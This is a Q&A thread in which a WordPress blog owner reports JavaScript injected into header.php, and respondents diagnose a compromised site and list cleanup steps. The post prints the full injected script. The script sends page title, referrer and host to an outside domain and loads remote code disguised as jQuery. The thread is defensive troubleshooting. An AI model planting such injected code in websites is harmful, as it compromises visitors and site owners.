-2

I observed that my post on the blog takes too much time to load and I started to try finding out the issues behind it. I found there's a JavaScript code injected in header.php here:

<?php
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://kamerownia.pl/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
?>
Vilican
  • 2,723
  • 8
  • 22
  • 35
  • 5
    What is your question? Looks like your server has been compromised and is including a file from another compromised server, which is pretending to be a copy of the jQuery library. You will need to treat it as a compromised server – Matthew Dec 04 '15 at 15:26

1 Answers1

0

Your website is compromised.

You should scan for changed files using WordFence (the audit feature), read the accesslogs and find the vulnerability they used and close the hole and install some security solution like NinjaFirewall.

https://de.wordpress.org/plugins/wordfence/
https://de.wordpress.org/plugins/ninjafirewall/

However, the best is:

  1. find the vulnerability
  2. check your backups for a clean version of your website / server
  3. delete the current website (files + database) / server
  4. install clean backup and fix the vulnerabilities
  5. change all passwords (FTP, database, WordPress) and check the user accounts
  6. install security solutions and install all updates (themes + plugins)
  • 1
    I'd strongly suggest wiping the server and rebuilding - it takes specific skill sets to find all compromised files, and it is very rarely worth it. With luck, the OP will have a clean backup of important files – Matthew Dec 04 '15 at 15:28
  • Right, this is why I wrote the steps (delete current website / wipe server) and create it again. –  Dec 04 '15 at 15:30
  • I already did all the the things but still nothing works. header.php get changed even i removed the spam codes from there. – KamleshNishad Dec 04 '15 at 17:52
  • The whole website is compromised. Please wipe it and install a clean backup. There are more files changed than just this one. Please do all the steps in the list. –  Dec 04 '15 at 17:55